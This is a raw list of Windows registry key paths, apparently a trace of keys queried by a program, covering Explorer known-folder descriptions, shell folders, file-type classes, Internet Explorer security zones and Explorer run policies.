HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\InitFolderHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001\ProfileImagePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\KindMap\.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\DelegateExecute
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.asp\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bas\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bat\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cer\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.chm\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cmd\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.com\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cpl\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.crt\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\wscript.exe
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\*
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\wscript.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\*
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\wscript.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1806
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1806
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers\TransparentEnabled
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\InheritConsoleHandles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SetWorkingDirectoryFromTarget
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\NoWorkingDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\User Shell Folders\Common Desktop
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\User Shell Folders\Common Start Menu
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\User Shell Folders\Common Programs
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\User Shell Folders\Common Startup
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}\PublishExpandedPath
